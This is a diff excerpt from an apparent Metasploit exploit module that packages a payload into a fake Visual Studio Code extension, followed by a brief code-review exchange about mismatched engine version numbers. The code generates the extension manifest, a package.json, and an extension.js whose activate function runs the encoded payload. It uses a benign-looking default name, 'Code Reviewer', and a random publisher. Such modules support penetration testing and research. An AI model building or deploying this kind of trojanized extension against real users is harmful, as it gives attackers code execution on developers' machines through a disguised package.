modules/exploits/multi/fileformat/visual_studio_vsix_exec.rb

```diff
@@ -0,0 +1,157 @@
+          ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
+          ['URL', 'https://code.visualstudio.com/api/references/activation-events'] # onStartup Action
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
+        'Privileged' => false,
+        'DisclosureDate' => '2024-03-22' # date of development
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [true, 'The name of the extension', 'Code Reviewer']),
+      OptString.new('DESCRIPTION', [true, 'The description of the extension', 'Reviews code']),
+      OptString.new('VERSION', [true, 'The version of the extension', '0.0.1']),
+      OptString.new('README', [false, 'The readme contents for the extension', '']),
+    ])
+  end
+
+  def name
+    datastore['NAME']
+  end
+
+  def description
+    datastore['DESCRIPTION']
+  end
+
+  def version
+    datastore['VERSION']
+  end
+
+  def readme
+    datastore['README']
+  end
+
+  def manifest
+    %(<?xml version="1.0" encoding="utf-8"?>
+<PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011">
+  <Metadata>
+    <Identity Language="en-US" Id="extension-name-fillmein" Version="#{version}" Publisher="#{Rex::Text.rand_text_alpha(10)}" />
+    <DisplayName>#{name}</DisplayName>
+    <Description xml:space="preserve">#{description}</Description>
+    <Tags></Tags>
+    <GalleryFlags>Public</GalleryFlags>
+
+    <Properties>
+      <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.87.0" />
+      <Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" />
+      <Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" />
+      <Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" />
+      <Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" />
+      <Property Id="Microsoft.VisualStudio.Services.GitHubFlavoredMarkdown" Value="true" />
+      <Property Id="Microsoft.VisualStudio.Services.Content.Pricing" Value="Free"/>
+    </Properties>
+  </Metadata>
+  <Installation>
+    <InstallationTarget Id="Microsoft.VisualStudio.Code"/>
+  </Installation>
+  <Dependencies/>
+  <Assets>
+    <Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" />
+  </Assets>
+</PackageManifest>)
+  end
+
+  def extension_js
+    %|const vscode = require('vscode');
+
+function activate(context) {
+  #{payload.encoded}
+}
+
+function deactivate() {}
+
+module.exports = {
+  activate,
+  deactivate
+}
+|
+  end
+
+  def package_json
+    %({
+  "name": "#{name.gsub(' ', '.')}",
+  "displayName": "#{name}",
+  "description": "#{description}",
+  "version": "#{version}",
+  "publisher":"#{Rex::Text.rand_name}",
+  "engines": {
+    "vscode": "^1.60.0"
```

Comment:
Just checking, this version is different than the one defined in `manifest` (1.87.0), does it matter?

Reply:
forgot to sync the version numbers. for future traveler notes, I arbitrarily picked 1.60 (August 2021 release date). I don't believe we're calling anything special (APIs and such) so this should work on many older versions.